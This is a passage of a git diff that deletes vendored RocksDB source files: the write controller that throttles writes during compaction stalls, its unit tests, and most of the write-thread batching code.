-// frequency to get time.
-// If it turns out to be a performance issue, we can redesign the thread
-// synchronization model here.
-// The function trust caller will sleep micros returned.
-uint64_t WriteController::GetDelay(Env* env, uint64_t num_bytes) {
-  if (total_stopped_.load(std::memory_order_relaxed) > 0) {
-    return 0;
-  }
-  if (total_delayed_.load(std::memory_order_relaxed) == 0) {
-    return 0;
-  }
-
-  const uint64_t kMicrosPerSecond = 1000000;
-  const uint64_t kRefillInterval = 1024U;
-
-  if (bytes_left_ >= num_bytes) {
-    bytes_left_ -= num_bytes;
-    return 0;
-  }
-  // The frequency to get time inside DB mutex is less than one per refill
-  // interval.
-  auto time_now = NowMicrosMonotonic(env);
-
-  uint64_t sleep_debt = 0;
-  uint64_t time_since_last_refill = 0;
-  if (last_refill_time_ != 0) {
-    if (last_refill_time_ > time_now) {
-      sleep_debt = last_refill_time_ - time_now;
-    } else {
-      time_since_last_refill = time_now - last_refill_time_;
-      bytes_left_ +=
-          static_cast<uint64_t>(static_cast<double>(time_since_last_refill) /
-                                kMicrosPerSecond * delayed_write_rate_);
-      if (time_since_last_refill >= kRefillInterval &&
-          bytes_left_ > num_bytes) {
-        // If refill interval already passed and we have enough bytes
-        // return without extra sleeping.
-        last_refill_time_ = time_now;
-        bytes_left_ -= num_bytes;
-        return 0;
-      }
-    }
-  }
-
-  uint64_t single_refill_amount =
-      delayed_write_rate_ * kRefillInterval / kMicrosPerSecond;
-  if (bytes_left_ + single_refill_amount >= num_bytes) {
-    // Wait until a refill interval
-    // Never trigger expire for less than one refill interval to avoid to get
-    // time.
-    bytes_left_ = bytes_left_ + single_refill_amount - num_bytes;
-    last_refill_time_ = time_now + kRefillInterval;
-    return kRefillInterval + sleep_debt;
-  }
-
-  // Need to refill more than one interval. Need to sleep longer. Check
-  // whether expiration will hit
-
-  // Sleep just until `num_bytes` is allowed.
-  uint64_t sleep_amount =
-      static_cast<uint64_t>(num_bytes /
-                            static_cast<long double>(delayed_write_rate_) *
-                            kMicrosPerSecond) +
-      sleep_debt;
-  last_refill_time_ = time_now + sleep_amount;
-  return sleep_amount;
-}
-
-uint64_t WriteController::NowMicrosMonotonic(Env* env) {
-  return env->NowNanos() / std::milli::den;
-}
-
-StopWriteToken::~StopWriteToken() {
-  assert(controller_->total_stopped_ >= 1);
-  --controller_->total_stopped_;
-}
-
-DelayWriteToken::~DelayWriteToken() {
-  controller_->total_delayed_--;
-  assert(controller_->total_delayed_.load() >= 0);
-}
-
-CompactionPressureToken::~CompactionPressureToken() {
-  controller_->total_compaction_pressure_--;
-  assert(controller_->total_compaction_pressure_ >= 0);
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/write_controller.h b/thirdparty/rocksdb/db/write_controller.h
deleted file mode 100644
index 7c301ce..0000000
--- a/thirdparty/rocksdb/db/write_controller.h
+++ /dev/null
@@ -1,144 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#include <stdint.h>
-
-#include <atomic>
-#include <memory>
-#include "rocksdb/rate_limiter.h"
-
-namespace rocksdb {
-
-class Env;
-class WriteControllerToken;
-
-// WriteController is controlling write stalls in our write code-path. Write
-// stalls happen when compaction can't keep up with write rate.
-// All of the methods here (including WriteControllerToken's destructors) need
-// to be called while holding DB mutex
-class WriteController {
- public:
-  explicit WriteController(uint64_t _delayed_write_rate = 1024u * 1024u * 32u,
-                           int64_t low_pri_rate_bytes_per_sec = 1024 * 1024)
-      : total_stopped_(0),
-        total_delayed_(0),
-        total_compaction_pressure_(0),
-        bytes_left_(0),
-        last_refill_time_(0),
-        low_pri_rate_limiter_(
-            NewGenericRateLimiter(low_pri_rate_bytes_per_sec)) {
-    set_max_delayed_write_rate(_delayed_write_rate);
-  }
-  ~WriteController() = default;
-
-  // When an actor (column family) requests a stop token, all writes will be
-  // stopped until the stop token is released (deleted)
-  std::unique_ptr<WriteControllerToken> GetStopToken();
-  // When an actor (column family) requests a delay token, total delay for all
-  // writes to the DB will be controlled under the delayed write rate. Every
-  // write needs to call GetDelay() with number of bytes writing to the DB,
-  // which returns number of microseconds to sleep.
-  std::unique_ptr<WriteControllerToken> GetDelayToken(
-      uint64_t delayed_write_rate);
-  // When an actor (column family) requests a moderate token, compaction
-  // threads will be increased
-  std::unique_ptr<WriteControllerToken> GetCompactionPressureToken();
-
-  // these three metods are querying the state of the WriteController
-  bool IsStopped() const;
-  bool NeedsDelay() const { return total_delayed_.load() > 0; }
-  bool NeedSpeedupCompaction() const {
-    return IsStopped() || NeedsDelay() || total_compaction_pressure_ > 0;
-  }
-  // return how many microseconds the caller needs to sleep after the call
-  // num_bytes: how many number of bytes to put into the DB.
-  // Prerequisite: DB mutex held.
-  uint64_t GetDelay(Env* env, uint64_t num_bytes);
-  void set_delayed_write_rate(uint64_t write_rate) {
-    // avoid divide 0
-    if (write_rate == 0) {
-      write_rate = 1u;
-    } else if (write_rate > max_delayed_write_rate()) {
-      write_rate = max_delayed_write_rate();
-    }
-    delayed_write_rate_ = write_rate;
-  }
-
-  void set_max_delayed_write_rate(uint64_t write_rate) {
-    // avoid divide 0
-    if (write_rate == 0) {
-      write_rate = 1u;
-    }
-    max_delayed_write_rate_ = write_rate;
-    // update delayed_write_rate_ as well
-    delayed_write_rate_ = write_rate;
-  }
-
-  uint64_t delayed_write_rate() const { return delayed_write_rate_; }
-
-  uint64_t max_delayed_write_rate() const { return max_delayed_write_rate_; }
-
-  RateLimiter* low_pri_rate_limiter() { return low_pri_rate_limiter_.get(); }
-
- private:
-  uint64_t NowMicrosMonotonic(Env* env);
-
-  friend class WriteControllerToken;
-  friend class StopWriteToken;
-  friend class DelayWriteToken;
-  friend class CompactionPressureToken;
-
-  std::atomic<int> total_stopped_;
-  std::atomic<int> total_delayed_;
-  std::atomic<int> total_compaction_pressure_;
-  uint64_t bytes_left_;
-  uint64_t last_refill_time_;
-  // write rate set when initialization or by `DBImpl::SetDBOptions`
-  uint64_t max_delayed_write_rate_;
-  // current write rate
-  uint64_t delayed_write_rate_;
-
-  std::unique_ptr<RateLimiter> low_pri_rate_limiter_;
-};
-
-class WriteControllerToken {
- public:
-  explicit WriteControllerToken(WriteController* controller)
-      : controller_(controller) {}
-  virtual ~WriteControllerToken() {}
-
- protected:
-  WriteController* controller_;
-
- private:
-  // no copying allowed
-  WriteControllerToken(const WriteControllerToken&) = delete;
-  void operator=(const WriteControllerToken&) = delete;
-};
-
-class StopWriteToken : public WriteControllerToken {
- public:
-  explicit StopWriteToken(WriteController* controller)
-      : WriteControllerToken(controller) {}
-  virtual ~StopWriteToken();
-};
-
-class DelayWriteToken : public WriteControllerToken {
- public:
-  explicit DelayWriteToken(WriteController* controller)
-      : WriteControllerToken(controller) {}
-  virtual ~DelayWriteToken();
-};
-
-class CompactionPressureToken : public WriteControllerToken {
- public:
-  explicit CompactionPressureToken(WriteController* controller)
-      : WriteControllerToken(controller) {}
-  virtual ~CompactionPressureToken();
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/write_controller_test.cc b/thirdparty/rocksdb/db/write_controller_test.cc
deleted file mode 100644
index a1fe3fa..0000000
--- a/thirdparty/rocksdb/db/write_controller_test.cc
+++ /dev/null
@@ -1,135 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#include <ratio>
-
-#include "db/write_controller.h"
-
-#include "rocksdb/env.h"
-#include "util/testharness.h"
-
-namespace rocksdb {
-
-class WriteControllerTest : public testing::Test {};
-
-class TimeSetEnv : public EnvWrapper {
- public:
-  explicit TimeSetEnv() : EnvWrapper(nullptr) {}
-  uint64_t now_micros_ = 6666;
-  virtual uint64_t NowNanos() override { return now_micros_ * std::milli::den; }
-};
-
-TEST_F(WriteControllerTest, ChangeDelayRateTest) {
-  TimeSetEnv env;
-  WriteController controller(40000000u);  // also set max delayed rate
-  controller.set_delayed_write_rate(10000000u);
-  auto delay_token_0 =
-      controller.GetDelayToken(controller.delayed_write_rate());
-  ASSERT_EQ(static_cast<uint64_t>(2000000),
-            controller.GetDelay(&env, 20000000u));
-  auto delay_token_1 = controller.GetDelayToken(2000000u);
-  ASSERT_EQ(static_cast<uint64_t>(10000000),
-            controller.GetDelay(&env, 20000000u));
-  auto delay_token_2 = controller.GetDelayToken(1000000u);
-  ASSERT_EQ(static_cast<uint64_t>(20000000),
-            controller.GetDelay(&env, 20000000u));
-  auto delay_token_3 = controller.GetDelayToken(20000000u);
-  ASSERT_EQ(static_cast<uint64_t>(1000000),
-            controller.GetDelay(&env, 20000000u));
-  // This is more than max rate. Max delayed rate will be used.
-  auto delay_token_4 =
-      controller.GetDelayToken(controller.delayed_write_rate() * 3);
-  ASSERT_EQ(static_cast<uint64_t>(500000),
-            controller.GetDelay(&env, 20000000u));
-}
-
-TEST_F(WriteControllerTest, SanityTest) {
-  WriteController controller(10000000u);
-  auto stop_token_1 = controller.GetStopToken();
-  auto stop_token_2 = controller.GetStopToken();
-
-  ASSERT_TRUE(controller.IsStopped());
-  stop_token_1.reset();
-  ASSERT_TRUE(controller.IsStopped());
-  stop_token_2.reset();
-  ASSERT_FALSE(controller.IsStopped());
-
-  TimeSetEnv env;
-
-  auto delay_token_1 = controller.GetDelayToken(10000000u);
-  ASSERT_EQ(static_cast<uint64_t>(2000000),
-            controller.GetDelay(&env, 20000000u));
-
-  env.now_micros_ += 1999900u;  // sleep debt 1000
-
-  auto delay_token_2 = controller.GetDelayToken(10000000u);
-  // Rate reset after changing the token.
-  ASSERT_EQ(static_cast<uint64_t>(2000000),
-            controller.GetDelay(&env, 20000000u));
-
-  env.now_micros_ += 1999900u;  // sleep debt 1000
-
-  // One refill: 10240 bytes allowed, 1000 used, 9240 left
-  ASSERT_EQ(static_cast<uint64_t>(1124), controller.GetDelay(&env, 1000u));
-  env.now_micros_ += 1124u;  // sleep debt 0
-
-  delay_token_2.reset();
-  // 1000 used, 8240 left
-  ASSERT_EQ(static_cast<uint64_t>(0), controller.GetDelay(&env, 1000u));
-
-  env.now_micros_ += 100u;  // sleep credit 100
-  // 1000 used, 7240 left
-  ASSERT_EQ(static_cast<uint64_t>(0), controller.GetDelay(&env, 1000u));
-
-  env.now_micros_ += 100u;  // sleep credit 200
-  // One refill: 10240 fileed, sleep credit generates 2000. 8000 used
-  //             7240 + 10240 + 2000 - 8000 = 11480 left
-  ASSERT_EQ(static_cast<uint64_t>(1024u), controller.GetDelay(&env, 8000u));
-
-  env.now_micros_ += 200u;  // sleep debt 824
-  // 1000 used, 10480 left.
-  ASSERT_EQ(static_cast<uint64_t>(0), controller.GetDelay(&env, 1000u));
-
-  env.now_micros_ += 200u;  // sleep debt 624
-  // Out of bound sleep, still 10480 left
-  ASSERT_EQ(static_cast<uint64_t>(3000624u),
-            controller.GetDelay(&env, 30000000u));
-
-  env.now_micros_ += 3000724u;  // sleep credit 100
-  // 6000 used, 4480 left.
-  ASSERT_EQ(static_cast<uint64_t>(0), controller.GetDelay(&env, 6000u));
-
-  env.now_micros_ += 200u;  // sleep credit 300
-  // One refill, credit 4480 balance + 3000 credit + 10240 refill
-  // Use 8000, 9720 left
-  ASSERT_EQ(static_cast<uint64_t>(1024u), controller.GetDelay(&env, 8000u));
-
-  env.now_micros_ += 3024u;  // sleep credit 2000
-
-  // 1720 left
-  ASSERT_EQ(static_cast<uint64_t>(0u), controller.GetDelay(&env, 8000u));
-
-  // 1720 balance + 20000 credit = 20170 left
-  // Use 8000, 12170 left
-  ASSERT_EQ(static_cast<uint64_t>(0u), controller.GetDelay(&env, 8000u));
-
-  // 4170 left
-  ASSERT_EQ(static_cast<uint64_t>(0u), controller.GetDelay(&env, 8000u));
-
-  // Need a refill
-  ASSERT_EQ(static_cast<uint64_t>(1024u), controller.GetDelay(&env, 9000u));
-
-  delay_token_1.reset();
-  ASSERT_EQ(static_cast<uint64_t>(0), controller.GetDelay(&env, 30000000u));
-  delay_token_1.reset();
-  ASSERT_FALSE(controller.IsStopped());
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/write_thread.cc b/thirdparty/rocksdb/db/write_thread.cc
deleted file mode 100644
index 2d3b346..0000000
--- a/thirdparty/rocksdb/db/write_thread.cc
+++ /dev/null
@@ -1,656 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "db/write_thread.h"
-#include <chrono>
-#include <thread>
-#include "db/column_family.h"
-#include "port/port.h"
-#include "util/random.h"
-#include "util/sync_point.h"
-
-namespace rocksdb {
-
-WriteThread::WriteThread(const ImmutableDBOptions& db_options)
-    : max_yield_usec_(db_options.enable_write_thread_adaptive_yield
-                          ? db_options.write_thread_max_yield_usec
-                          : 0),
-      slow_yield_usec_(db_options.write_thread_slow_yield_usec),
-      allow_concurrent_memtable_write_(
-          db_options.allow_concurrent_memtable_write),
-      enable_pipelined_write_(db_options.enable_pipelined_write),
-      newest_writer_(nullptr),
-      newest_memtable_writer_(nullptr),
-      last_sequence_(0) {}
-
-uint8_t WriteThread::BlockingAwaitState(Writer* w, uint8_t goal_mask) {
-  // We're going to block.  Lazily create the mutex.  We guarantee
-  // propagation of this construction to the waker via the
-  // STATE_LOCKED_WAITING state.  The waker won't try to touch the mutex
-  // or the condvar unless they CAS away the STATE_LOCKED_WAITING that
-  // we install below.
-  w->CreateMutex();
-
-  auto state = w->state.load(std::memory_order_acquire);
-  assert(state != STATE_LOCKED_WAITING);
-  if ((state & goal_mask) == 0 &&
-      w->state.compare_exchange_strong(state, STATE_LOCKED_WAITING)) {
-    // we have permission (and an obligation) to use StateMutex
-    std::unique_lock<std::mutex> guard(w->StateMutex());
-    w->StateCV().wait(guard, [w] {
-      return w->state.load(std::memory_order_relaxed) != STATE_LOCKED_WAITING;
-    });
-    state = w->state.load(std::memory_order_relaxed);
-  }
-  // else tricky.  Goal is met or CAS failed.  In the latter case the waker
-  // must have changed the state, and compare_exchange_strong has updated
-  // our local variable with the new one.  At the moment WriteThread never
-  // waits for a transition across intermediate states, so we know that
-  // since a state change has occurred the goal must have been met.
-  assert((state & goal_mask) != 0);
-  return state;
-}
-
-uint8_t WriteThread::AwaitState(Writer* w, uint8_t goal_mask,
-                                AdaptationContext* ctx) {
-  uint8_t state;
-
-  // 1. Busy loop using "pause" for 1 micro sec
-  // 2. Else SOMETIMES busy loop using "yield" for 100 micro sec (default)
-  // 3. Else blocking wait
-
-  // On a modern Xeon each loop takes about 7 nanoseconds (most of which
-  // is the effect of the pause instruction), so 200 iterations is a bit
-  // more than a microsecond.  This is long enough that waits longer than
-  // this can amortize the cost of accessing the clock and yielding.
-  for (uint32_t tries = 0; tries < 200; ++tries) {
-    state = w->state.load(std::memory_order_acquire);
-    if ((state & goal_mask) != 0) {
-      return state;
-    }
-    port::AsmVolatilePause();
-  }
-
-  // If we're only going to end up waiting a short period of time,
-  // it can be a lot more efficient to call std::this_thread::yield()
-  // in a loop than to block in StateMutex().  For reference, on my 4.0
-  // SELinux test server with support for syscall auditing enabled, the
-  // minimum latency between FUTEX_WAKE to returning from FUTEX_WAIT is
-  // 2.7 usec, and the average is more like 10 usec.  That can be a big
-  // drag on RockDB's single-writer design.  Of course, spinning is a
-  // bad idea if other threads are waiting to run or if we're going to
-  // wait for a long time.  How do we decide?
-  //
-  // We break waiting into 3 categories: short-uncontended,
-  // short-contended, and long.  If we had an oracle, then we would always
-  // spin for short-uncontended, always block for long, and our choice for
-  // short-contended might depend on whether we were trying to optimize
-  // RocksDB throughput or avoid being greedy with system resources.
-  //
-  // Bucketing into short or long is easy by measuring elapsed time.
-  // Differentiating short-uncontended from short-contended is a bit
-  // trickier, but not too bad.  We could look for involuntary context
-  // switches using getrusage(RUSAGE_THREAD, ..), but it's less work
-  // (portability code and CPU) to just look for yield calls that take
-  // longer than we expect.  sched_yield() doesn't actually result in any
-  // context switch overhead if there are no other runnable processes
-  // on the current core, in which case it usually takes less than
-  // a microsecond.
-  //
-  // There are two primary tunables here: the threshold between "short"
-  // and "long" waits, and the threshold at which we suspect that a yield
-  // is slow enough to indicate we should probably block.  If these
-  // thresholds are chosen well then CPU-bound workloads that don't
-  // have more threads than cores will experience few context switches
-  // (voluntary or involuntary), and the total number of context switches
-  // (voluntary and involuntary) will not be dramatically larger (maybe
-  // 2x) than the number of voluntary context switches that occur when
-  // --max_yield_wait_micros=0.
-  //
-  // There's another constant, which is the number of slow yields we will
-  // tolerate before reversing our previous decision.  Solitary slow
-  // yields are pretty common (low-priority small jobs ready to run),
-  // so this should be at least 2.  We set this conservatively to 3 so
-  // that we can also immediately schedule a ctx adaptation, rather than
-  // waiting for the next update_ctx.
-
-  const size_t kMaxSlowYieldsWhileSpinning = 3;
-
-  // Whether the yield approach has any credit in this context. The credit is
-  // added by yield being succesfull before timing out, and decreased otherwise.
-  auto& yield_credit = ctx->value;
-  // Update the yield_credit based on sample runs or right after a hard failure
-  bool update_ctx = false;
-  // Should we reinforce the yield credit
-  bool would_spin_again = false;
-  // The samling base for updating the yeild credit. The sampling rate would be
-  // 1/sampling_base.
-  const int sampling_base = 256;
-
-  if (max_yield_usec_ > 0) {
-    update_ctx = Random::GetTLSInstance()->OneIn(sampling_base);
-
-    if (update_ctx || yield_credit.load(std::memory_order_relaxed) >= 0) {
-      // we're updating the adaptation statistics, or spinning has >
-      // 50% chance of being shorter than max_yield_usec_ and causing no
-      // involuntary context switches
-      auto spin_begin = std::chrono::steady_clock::now();
-
-      // this variable doesn't include the final yield (if any) that
-      // causes the goal to be met
-      size_t slow_yield_count = 0;
-
-      auto iter_begin = spin_begin;
-      while ((iter_begin - spin_begin) <=
-             std::chrono::microseconds(max_yield_usec_)) {
-        std::this_thread::yield();
-
-        state = w->state.load(std::memory_order_acquire);
-        if ((state & goal_mask) != 0) {
-          // success
-          would_spin_again = true;
-          break;
-        }
-
-        auto now = std::chrono::steady_clock::now();
-        if (now == iter_begin ||
-            now - iter_begin >= std::chrono::microseconds(slow_yield_usec_)) {
-          // conservatively count it as a slow yield if our clock isn't
-          // accurate enough to measure the yield duration
-          ++slow_yield_count;
-          if (slow_yield_count >= kMaxSlowYieldsWhileSpinning) {
-            // Not just one ivcsw, but several.  Immediately update yield_credit
-            // and fall back to blocking
-            update_ctx = true;
-            break;
-          }
-        }
-        iter_begin = now;
-      }
-    }
-  }
-
-  if ((state & goal_mask) == 0) {
-    state = BlockingAwaitState(w, goal_mask);
-  }
-
-  if (update_ctx) {
-    // Since our update is sample based, it is ok if a thread overwrites the
-    // updates by other threads. Thus the update does not have to be atomic.
-    auto v = yield_credit.load(std::memory_order_relaxed);
-    // fixed point exponential decay with decay constant 1/1024, with +1
-    // and -1 scaled to avoid overflow for int32_t
-    //
-    // On each update the positive credit is decayed by a facor of 1/1024 (i.e.,
-    // 0.1%). If the sampled yield was successful, the credit is also increased
-    // by X. Setting X=2^17 ensures that the credit never exceeds
-    // 2^17*2^10=2^27, which is lower than 2^31 the upperbound of int32_t. Same
-    // logic applies to negative credits.
-    v = v - (v / 1024) + (would_spin_again ? 1 : -1) * 131072;
-    yield_credit.store(v, std::memory_order_relaxed);
-  }
-
-  assert((state & goal_mask) != 0);
-  return state;
-}
-
-void WriteThread::SetState(Writer* w, uint8_t new_state) {
-  auto state = w->state.load(std::memory_order_acquire);
-  if (state == STATE_LOCKED_WAITING ||
-      !w->state.compare_exchange_strong(state, new_state)) {
-    assert(state == STATE_LOCKED_WAITING);
-
-    std::lock_guard<std::mutex> guard(w->StateMutex());
-    assert(w->state.load(std::memory_order_relaxed) != new_state);
-    w->state.store(new_state, std::memory_order_relaxed);
-    w->StateCV().notify_one();
-  }
-}
-
-bool WriteThread::LinkOne(Writer* w, std::atomic<Writer*>* newest_writer) {
-  assert(newest_writer != nullptr);
-  assert(w->state == STATE_INIT);
-  Writer* writers = newest_writer->load(std::memory_order_relaxed);
-  while (true) {
-    w->link_older = writers;
-    if (newest_writer->compare_exchange_weak(writers, w)) {
-      return (writers == nullptr);
-    }
-  }
-}
-
-bool WriteThread::LinkGroup(WriteGroup& write_group,
-                            std::atomic<Writer*>* newest_writer) {
-  assert(newest_writer != nullptr);
-  Writer* leader = write_group.leader;
-  Writer* last_writer = write_group.last_writer;
-  Writer* w = last_writer;
-  while (true) {
-    // Unset link_newer pointers to make sure when we call
-    // CreateMissingNewerLinks later it create all missing links.
-    w->link_newer = nullptr;
-    w->write_group = nullptr;
-    if (w == leader) {
-      break;
-    }
-    w = w->link_older;
-  }
-  Writer* newest = newest_writer->load(std::memory_order_relaxed);
-  while (true) {
-    leader->link_older = newest;
-    if (newest_writer->compare_exchange_weak(newest, last_writer)) {
-      return (newest == nullptr);
-    }
-  }
-}
-
-void WriteThread::CreateMissingNewerLinks(Writer* head) {
-  while (true) {
-    Writer* next = head->link_older;
-    if (next == nullptr || next->link_newer != nullptr) {
-      assert(next == nullptr || next->link_newer == head);
-      break;
-    }
-    next->link_newer = head;
-    head = next;
-  }
-}
-
-void WriteThread::CompleteLeader(WriteGroup& write_group) {
-  assert(write_group.size > 0);
-  Writer* leader = write_group.leader;
-  if (write_group.size == 1) {
-    write_group.leader = nullptr;
-    write_group.last_writer = nullptr;
-  } else {
-    assert(leader->link_newer != nullptr);
-    leader->link_newer->link_older = nullptr;
-    write_group.leader = leader->link_newer;
-  }
-  write_group.size -= 1;
-  SetState(leader, STATE_COMPLETED);
-}
-
-void WriteThread::CompleteFollower(Writer* w, WriteGroup& write_group) {
-  assert(write_group.size > 1);
-  assert(w != write_group.leader);
-  if (w == write_group.last_writer) {
-    w->link_older->link_newer = nullptr;
-    write_group.last_writer = w->link_older;
-  } else {
-    w->link_older->link_newer = w->link_newer;
-    w->link_newer->link_older = w->link_older;
-  }
-  write_group.size -= 1;
-  SetState(w, STATE_COMPLETED);
-}
-
-static WriteThread::AdaptationContext jbg_ctx("JoinBatchGroup");
-void WriteThread::JoinBatchGroup(Writer* w) {
-  TEST_SYNC_POINT_CALLBACK("WriteThread::JoinBatchGroup:Start", w);
-  assert(w->batch != nullptr);
-
-  bool linked_as_leader = LinkOne(w, &newest_writer_);
-  if (linked_as_leader) {
-    SetState(w, STATE_GROUP_LEADER);
-  }
-
-  TEST_SYNC_POINT_CALLBACK("WriteThread::JoinBatchGroup:Wait", w);
-
-  if (!linked_as_leader) {
-    /**
-     * Wait util:
-     * 1) An existing leader pick us as the new leader when it finishes
-     * 2) An existing leader pick us as its follewer and
-     * 2.1) finishes the memtable writes on our behalf
-     * 2.2) Or tell us to finish the memtable writes in pralallel
-     * 3) (pipelined write) An existing leader pick us as its follower and
-     *    finish book-keeping and WAL write for us, enqueue us as pending
-     *    memtable writer, and
-     * 3.1) we become memtable writer group leader, or
-     * 3.2) an existing memtable writer group leader tell us to finish memtable
-     *      writes in parallel.
-     */
-    AwaitState(w, STATE_GROUP_LEADER | STATE_MEMTABLE_WRITER_LEADER |
-                      STATE_PARALLEL_MEMTABLE_WRITER | STATE_COMPLETED,
-               &jbg_ctx);
-    TEST_SYNC_POINT_CALLBACK("WriteThread::JoinBatchGroup:DoneWaiting", w);
-  }
-}
-
-size_t WriteThread::EnterAsBatchGroupLeader(Writer* leader,
-                                            WriteGroup* write_group) {
-  assert(leader->link_older == nullptr);
-  assert(leader->batch != nullptr);
-  assert(write_group != nullptr);
-
-  size_t size = WriteBatchInternal::ByteSize(leader->batch);
-
-  // Allow the group to grow up to a maximum size, but if the
-  // original write is small, limit the growth so we do not slow
-  // down the small write too much.
-  size_t max_size = 1 << 20;
-  if (size <= (128 << 10)) {
-    max_size = size + (128 << 10);
-  }
-
-  leader->write_group = write_group;
-  write_group->leader = leader;
-  write_group->last_writer = leader;
-  write_group->size = 1;
-  Writer* newest_writer = newest_writer_.load(std::memory_order_acquire);
-
-  // This is safe regardless of any db mutex status of the caller. Previous
-  // calls to ExitAsGroupLeader either didn't call CreateMissingNewerLinks
-  // (they emptied the list and then we added ourself as leader) or had to
-  // explicitly wake us up (the list was non-empty when we added ourself,
-  // so we have already received our MarkJoined).
-  CreateMissingNewerLinks(newest_writer);
-
-  // Tricky. Iteration start (leader) is exclusive and finish
-  // (newest_writer) is inclusive. Iteration goes from old to new.
-  Writer* w = leader;
-  while (w != newest_writer) {
-    w = w->link_newer;
-
-    if (w->sync && !leader->sync) {
-      // Do not include a sync write into a batch handled by a non-sync write.
-      break;
-    }
-
-    if (w->no_slowdown != leader->no_slowdown) {
-      // Do not mix writes that are ok with delays with the ones that
-      // request fail on delays.
-      break;
-    }
-
-    if (!w->disable_wal && leader->disable_wal) {
-      // Do not include a write that needs WAL into a batch that has
-      // WAL disabled.
-      break;
-    }
-
-    if (w->batch == nullptr) {
-      // Do not include those writes with nullptr batch. Those are not writes,
-      // those are something else. They want to be alone
-      break;
-    }
-
-    if (w->callback != nullptr && !w->callback->AllowWriteBatching()) {
-      // dont batch writes that don't want to be batched
-      break;
-    }
-
-    auto batch_size = WriteBatchInternal::ByteSize(w->batch);
-    if (size + batch_size > max_size) {
-      // Do not make batch too big
-      break;
-    }
-
-    w->write_group = write_group;
-    size += batch_size;
-    write_group->last_writer = w;
-    write_group->size++;
-  }
-  return size;
-}
-
-void WriteThread::EnterAsMemTableWriter(Writer* leader,
-                                        WriteGroup* write_group) {
-  assert(leader != nullptr);
-  assert(leader->link_older == nullptr);
-  assert(leader->batch != nullptr);
-  assert(write_group != nullptr);
-
-  size_t size = WriteBatchInternal::ByteSize(leader->batch);
-
-  // Allow the group to grow up to a maximum size, but if the
-  // original write is small, limit the growth so we do not slow
-  // down the small write too much.
-  size_t max_size = 1 << 20;
-  if (size <= (128 << 10)) {
-    max_size = size + (128 << 10);
-  }
-
-  leader->write_group = write_group;
-  write_group->leader = leader;
-  write_group->size = 1;
-  Writer* last_writer = leader;
-
-  if (!allow_concurrent_memtable_write_ || !leader->batch->HasMerge()) {
-    Writer* newest_writer = newest_memtable_writer_.load();
-    CreateMissingNewerLinks(newest_writer);
-
-    Writer* w = leader;
-    while (w != newest_writer) {
-      w = w->link_newer;
-
-      if (w->batch == nullptr) {
-        break;
-      }
-
-      if (w->batch->HasMerge()) {
-        break;
-      }
-
-      if (!allow_concurrent_memtable_write_) {
-        auto batch_size = WriteBatchInternal::ByteSize(w->batch);
-        if (size + batch_size > max_size) {
-          // Do not make batch too big
-          break;
-        }
-        size += batch_size;
-      }
-
-      w->write_group = write_group;
-      last_writer = w;
-      write_group->size++;
-    }
-  }
-
-  write_group->last_writer = last_writer;
-  write_group->last_sequence =
-      last_writer->sequence + WriteBatchInternal::Count(last_writer->batch) - 1;
-}
-
-void WriteThread::ExitAsMemTableWriter(Writer* self, WriteGroup& write_group) {
-  Writer* leader = write_group.leader;
-  Writer* last_writer = write_group.last_writer;
-
-  Writer* newest_writer = last_writer;
-  if (!newest_memtable_writer_.compare_exchange_strong(newest_writer,
-                                                       nullptr)) {
-    CreateMissingNewerLinks(newest_writer);
-    Writer* next_leader = last_writer->link_newer;
-    assert(next_leader != nullptr);
-    next_leader->link_older = nullptr;
-    SetState(next_leader, STATE_MEMTABLE_WRITER_LEADER);
-  }
-  Writer* w = leader;
-  while (true) {
-    if (!write_group.status.ok()) {
-      w->status = write_group.status;
-    }
-    Writer* next = w->link_newer;
-    if (w != leader) {
-      SetState(w, STATE_COMPLETED);
-    }
-    if (w == last_writer) {
-      break;
-    }
-    w = next;
-  }
-  // Note that leader has to exit last, since it owns the write group.
-  SetState(leader, STATE_COMPLETED);
-}
-
-void WriteThread::LaunchParallelMemTableWriters(WriteGroup* write_group) {
-  assert(write_group != nullptr);
-  write_group->running.store(write_group->size);
-  for (auto w : *write_group) {
-    SetState(w, STATE_PARALLEL_MEMTABLE_WRITER);
-  }
-}
-
-static WriteThread::AdaptationContext cpmtw_ctx("CompleteParallelMemTableWriter");
-// This method is called by both the leader and parallel followers
-bool WriteThread::CompleteParallelMemTableWriter(Writer* w) {
-
-  auto* write_group = w->write_group;
-  if (!w->status.ok()) {
-    std::lock_guard<std::mutex> guard(write_group->leader->StateMutex());
-    write_group->status = w->status;
-  }
-
-  if (write_group->running-- > 1) {
-    // we're not the last one
-    AwaitState(w, STATE_COMPLETED, &cpmtw_ctx);
-    return false;
-  }
-  // else we're the last parallel worker and should perform exit duties.
-  w->status = write_group->status;
-  return true;
-}
-
-void WriteThread::ExitAsBatchGroupFollower(Writer* w) {
-  auto* write_group = w->write_group;
-
-  assert(w->state == STATE_PARALLEL_MEMTABLE_WRITER);
-  assert(write_group->status.ok());
-  ExitAsBatchGroupLeader(*write_group, write_group->status);
-  assert(w->status.ok());
-  assert(w->state == STATE_COMPLETED);
-  SetState(write_group->leader, STATE_COMPLETED);
-}
-
-static WriteThread::AdaptationContext eabgl_ctx("ExitAsBatchGroupLeader");
-void WriteThread::ExitAsBatchGroupLeader(WriteGroup& write_group,
-                                         Status status) {
-  Writer* leader = write_group.leader;
-  Writer* last_writer = write_group.last_writer;
-  assert(leader->link_older == nullptr);
-
-  if (enable_pipelined_write_) {
-    // Notify writers don't write to memtable to exit.
-    for (Writer* w = last_writer; w != leader;) {
-      Writer* next = w->link_older;
-      w->status = status;
-      if (!w->ShouldWriteToMemtable()) {
-        CompleteFollower(w, write_group);
-      }
